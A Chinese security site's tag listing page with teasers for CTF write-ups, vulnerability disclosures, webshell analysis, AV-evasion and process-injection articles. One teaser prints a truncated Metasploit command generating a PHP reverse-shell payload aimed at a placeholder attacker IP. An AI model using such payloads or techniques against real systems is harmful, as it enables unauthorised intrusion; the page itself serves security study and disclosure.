handler - 第 13 | CN-SEC 中文网

CTF专场

攻防世界easytornado

打开做题环境后，会发现这么一个页面，也就是三个文件，里面都有一些内容，应该是和我们的做题步骤应该是有所关联的按照文件顺序打开，分别是这三个内容，一个告诉我们flag的路径在/fllllllllllll...

10月30日46 views评论

阅读全文

安全文章

金蝶云星空 FileProxyHandler 文件读取

免责声明由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，WK安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。...

10月26日335 views评论

阅读全文

安全漏洞

【严重漏洞】【POC已公开】Cachet 易受身份验证的远程代码执行攻击

皓月当空，明镜高悬文末有图片更好保存~漏洞早知道漏洞名称：Cachet 易受身份验证的远程代码执行攻击漏洞出现时间：2023年10月16日影...

10月17日33 views评论

阅读全文

安全文章

URL 解析与鉴权中的陷阱 —— Spring 篇

在上一篇文章中介绍了 Java Web 应用中 URL 解析与鉴权认证中的常见陷阱，但主要针对 Servlet 容器进行分析。前文末尾也提到了，当前 Web 应用多是使用 Spring 全家桶进行开发...

09月10日31 views评论

阅读全文

安全文章

借助AI分析哥斯拉木马原理与Tomcat回显链路挖掘

前言本次分析使用了ChatGPT进行辅助分析，大大提升了工作效率，很快就分析出木马的工作流程和构造出利用方式。分析• 首先对该木马进行格式化,以增强代码的可读性。得到如下代码<jsp:...

09月05日19 views评论

阅读全文

CTF专场

i春秋2020新春公益赛 GYCTF有关SQL注入题复现

0x00 前言最近这段时间参加过一些CTF在线竞赛，做过一些Web题，发现SQL注入漏洞出现的频率可真高！不过在做题中也get到了一些Web新知识，现在通过题目复现的方式总结一下。0x01 black...

08月05日43 views已关闭评论

阅读全文

CTF专场

CTF 看雪&阿里《第2届移动安全挑战》第一题 Cobb的记忆

一前言路漫漫其修远兮，吾将上下而求索。看雪ctf板块中：二分析2.1 入手点定位安装apk，需逆向寻找正确的flag，输入错入flag，提示如下：将AliCrackme2_1.apk使用jadx打开，...

07月24日25 views评论

阅读全文

安全文章

干货 | 免杀绕过360核晶防护与Defender，附代码

SysWhispers3WinHttpSysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译，文件大小14KB，可免杀绕过36...

06月06日406 views评论

阅读全文

程序逆向

CreateThread和CreateRemoteThread实现进程注入（一）

0X00 什么是进程注入进程注入技术一直以来都是一个老生常谈的话题。这是一种广泛应用于恶意软件和无文件攻击中的逃避技术，这意味着攻击者可以将自定义代码运行在另一个进程的地址空间内，然后去进行敏感操作，...

06月05日38 views评论

阅读全文

利用metasploit进行提权（Php + Linux）Shell反弹

当LINUX提权反弹不了时.经常遇到这种情况请出MSF ..生成WEBSHELL文件 msf > msfpayload php/reverse_php LHOST=你的IP LPOR...

06月02日安全文章105 views评论

阅读全文

安全文章

Apache Solr<= 8.8.2 (最新) 任意文件删除

1.Download the latest versionhttps://apache.claz.org/lucene/solr/8.8.2/solr-8.8.2.tgz 2.Startin...

05月15日44 views评论

阅读全文

安全漏洞

Apache Flink (最新版本) 远程代码执行

路虽远，行则将至，事虽难，做则必成漏洞描述：近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 漏洞影响：Apache Flink <= 1...

05月04日52 views评论

阅读全文

攻防世界easytornado

金蝶云星空 FileProxyHandler 文件读取

【严重漏洞】【POC已公开】Cachet 易受身份验证的远程代码执行攻击

URL 解析与鉴权中的陷阱 —— Spring 篇

借助AI分析哥斯拉木马原理与Tomcat回显链路挖掘

i春秋2020新春公益赛 GYCTF有关SQL注入题复现

CTF 看雪&阿里《第2届移动安全挑战》第一题 Cobb的记忆

干货 | 免杀绕过360核晶防护与Defender，附代码

CreateThread和CreateRemoteThread实现进程注入（一）

利用metasploit进行提权（Php + Linux）Shell反弹

Apache Solr<= 8.8.2 (最新) 任意文件删除

Apache Flink (最新版本) 远程代码执行

在线咨询

微信